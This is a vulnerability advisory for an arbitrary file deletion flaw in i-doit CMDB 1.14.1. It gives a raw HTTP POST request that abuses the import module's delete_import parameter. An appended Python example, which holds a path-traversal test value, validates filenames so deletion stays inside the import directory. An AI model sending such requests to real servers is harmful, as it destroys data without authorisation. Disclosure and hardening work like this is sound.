i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-05-06
Type : webapps
Platform : php
This exploit / vulnerability (i-doit Open Source CMDB 1.14.1 arbitrary file deletion) is for educational purposes only; if you use it, you do so at your own risk!
# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage:
# Software Link:
# Version: v1.14.1
# Tested on: Xampp
# Credit: İsmail BOZKURT
Vulnerable Module ---> Import Module
Vulnerable parameter ---> delete_import
POST /idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ******************************
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/idoit/?moduleID=50&param=1&treeNode=501&mNavID=2
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.3
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-i-doit-Tenant-Id: 1
Content-Length: 30
DNT: 1
Connection: close
Cookie: PHPSESSID=bf21********************************68b8

delete_import=Type the filename, you want to delete from the server here
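
Added example, not part of the advisory and not i-doit code: the advisory does not show the server-side handler, so this sketches the check a delete handler needs before acting on a client-supplied delete_import value, confining the resolved path to a single import directory. The directory layout, file names and function names are assumptions made for the illustration.

```python
import os
import tempfile
from urllib.parse import parse_qs

# Constructed request head modelled on the advisory's request (no session data).
REQUEST_HEAD = (
    "POST /idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "Content-type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "\r\n"
)

def extract_delete_import(raw_request):
    """Return the decoded delete_import value from a form-encoded POST, or None."""
    _, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    values = parse_qs(body.strip(), keep_blank_values=True).get("delete_import")
    return values[0] if values else None

def resolve_in_import_dir(import_dir, name):
    """Return the real path of `name` inside import_dir, or None if rejected."""
    # Accept a bare filename only: no separators, no dot entries, no NUL byte.
    if not name or name in (".", "..") or "\x00" in name:
        return None
    if "/" in name or "\\" in name:
        return None
    base = os.path.realpath(import_dir)
    target = os.path.realpath(os.path.join(base, name))
    # realpath follows symlinks, so a link that points outside base fails here.
    if os.path.dirname(target) != base or not os.path.isfile(target):
        return None
    return target

def demo():
    """Check two constructed request bodies against a temporary import directory."""
    with tempfile.TemporaryDirectory() as root:
        imports = os.path.join(root, "imports")  # assumed upload directory
        os.mkdir(imports)
        for path in (os.path.join(imports, "hosts.csv"),
                     os.path.join(root, "outside.txt")):
            open(path, "w").close()
        results = {}
        for body in ("delete_import=hosts.csv", "delete_import=..%2Foutside.txt"):
            name = extract_delete_import(REQUEST_HEAD + body)
            results[name] = resolve_in_import_dir(imports, name) is not None
        return results

if __name__ == "__main__":
    print(demo())
```

The same extraction function can be pointed at proxy or WAF captures of requests to the import module to flag delete_import values that are not bare filenames.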